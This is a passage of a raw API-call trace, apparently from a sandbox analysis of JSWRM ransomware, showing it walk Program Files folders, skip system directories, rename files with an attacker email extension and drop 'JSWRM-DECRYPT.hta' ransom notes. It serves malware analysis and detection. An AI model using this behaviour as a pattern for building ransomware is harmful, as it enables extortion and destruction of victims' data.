lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0068.729] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-tw\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.729] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10076646113791312) returned 0 [0068.729] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0068.729] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0068.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0068.729] CloseHandle (hObject=0xffffffff) returned 1 [0068.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0068.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0068.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0068.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0068.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0068.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0068.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.730] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-tw\\tipresx.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\tipresx.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-tw\\tipresx.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0068.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0068.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0068.730] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e0daa01, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e0daa01, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e100c60, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0068.730] FindClose (in: hFindFile=0x2321c0 | out: hFindFile=0x2321c0) returned 1 [0068.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0068.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0068.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0068.730] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c97fd, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3ecc0a, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0068.730] FindClose (in: hFindFile=0x231f40 | out: hFindFile=0x231f40) returned 1 [0068.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0068.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0068.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0068.730] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ee224c5, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1ee224c5, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1ee224c5, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x22c3c4, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.731] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.731] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.731] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.731] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.731] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.731] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.731] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.731] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.731] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.731] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0068.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0068.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2413a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0068.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0068.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0068.731] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa098a4c6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x71143a45, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22c3c4, cFileName="MSInfo", cAlternateFileName="")) returned 1 [0068.731] lstrcmpiW (lpString1="MSInfo", lpString2=".") returned 1 [0068.731] lstrcmpiW (lpString1="MSInfo", lpString2="..") returned 1 [0068.731] lstrcmpiW (lpString1="MSInfo", lpString2="...") returned 1 [0068.731] lstrcmpiW (lpString1="MSInfo", lpString2="windows") returned -1 [0068.731] lstrcmpiW (lpString1="MSInfo", lpString2="recovery") returned -1 [0068.731] lstrcmpiW (lpString1="MSInfo", lpString2="perflogs") returned -1 [0068.731] lstrcmpiW (lpString1="MSInfo", lpString2="documents and settings") returned 1 [0068.731] lstrcmpiW (lpString1="MSInfo", lpString2="$RECYCLE.BIN") returned 1 [0068.732] lstrcmpiW (lpString1="MSInfo", lpString2="system volume information") returned -1 [0068.732] lstrcmpiW (lpString1="MSInfo", lpString2="msocache") returned -1 [0068.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0068.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0068.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224e60 [0068.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224e60 | out: hHeap=0x1e0000) returned 1 [0068.732] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\jswrm-decrypt.hta")) returned 0xffffffff [0068.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.732] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.732] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345be5c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0068.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24c1d0 [0068.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0068.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24dfa0 [0068.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0068.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0068.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0068.732] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0068.732] SetFilePointer (in: hFile=0x298, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.732] WriteFile (in: hFile=0x298, lpBuffer=0x345bf70*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bf3c, lpOverlapped=0x0 | out: lpBuffer=0x345bf70*, lpNumberOfBytesWritten=0x345bf3c*=0x230c, lpOverlapped=0x0) returned 1 [0068.734] CloseHandle (hObject=0x298) returned 1 [0068.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24dfa0 | out: hHeap=0x1e0000) returned 1 [0068.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0068.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0068.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209440 [0068.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2095a8 [0068.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0068.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0068.734] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\jswrm-decrypt.hta")) returned 0x20 [0068.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2095a8 | out: hHeap=0x1e0000) returned 1 [0068.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0068.734] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\*.*", lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa098a4c6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1fa0714b, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName=".", cAlternateFileName="")) returned 0x231d40 [0068.734] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.734] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa098a4c6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1fa0714b, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="..", cAlternateFileName="")) returned 1 [0068.734] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.734] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.734] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b209410, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa098aa4a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b209410, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="en-US", cAlternateFileName="")) returned 1 [0068.734] lstrcmpiW (lpString1="en-US", lpString2=".") returned 1 [0068.734] lstrcmpiW (lpString1="en-US", lpString2="..") returned 1 [0068.734] lstrcmpiW (lpString1="en-US", lpString2="...") returned 1 [0068.734] lstrcmpiW (lpString1="en-US", lpString2="windows") returned -1 [0068.735] lstrcmpiW (lpString1="en-US", lpString2="recovery") returned -1 [0068.735] lstrcmpiW (lpString1="en-US", lpString2="perflogs") returned -1 [0068.735] lstrcmpiW (lpString1="en-US", lpString2="documents and settings") returned 1 [0068.735] lstrcmpiW (lpString1="en-US", lpString2="$RECYCLE.BIN") returned 1 [0068.735] lstrcmpiW (lpString1="en-US", lpString2="system volume information") returned -1 [0068.735] lstrcmpiW (lpString1="en-US", lpString2="msocache") returned -1 [0068.735] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2256e0 [0068.735] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0068.735] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0068.735] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.735] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.735] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.735] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\jswrm-decrypt.hta")) returned 0xffffffff [0068.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.736] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.736] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0068.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0068.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0068.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0068.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.736] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0068.736] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.736] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0068.738] CloseHandle (hObject=0x454) returned 1 [0068.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0068.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0068.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0068.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0068.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0068.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.738] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\jswrm-decrypt.hta")) returned 0x20 [0068.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0068.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0068.738] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b209410, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa098aa4a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1fa0714b, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224dc4, cFileName=".", cAlternateFileName="")) returned 0x231cc0 [0068.738] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.738] FindNextFileW (in: hFindFile=0x231cc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b209410, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa098aa4a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1fa0714b, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224dc4, cFileName="..", cAlternateFileName="")) returned 1 [0068.738] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.738] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.738] FindNextFileW (in: hFindFile=0x231cc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fa0714b, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1fa0714b, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1fa2d16a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x224dc4, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.738] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.738] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.738] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.738] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.738] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.738] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.739] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.739] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.739] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.739] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.739] RtlAllocateHeap (HeapHandle=0x1e0000, 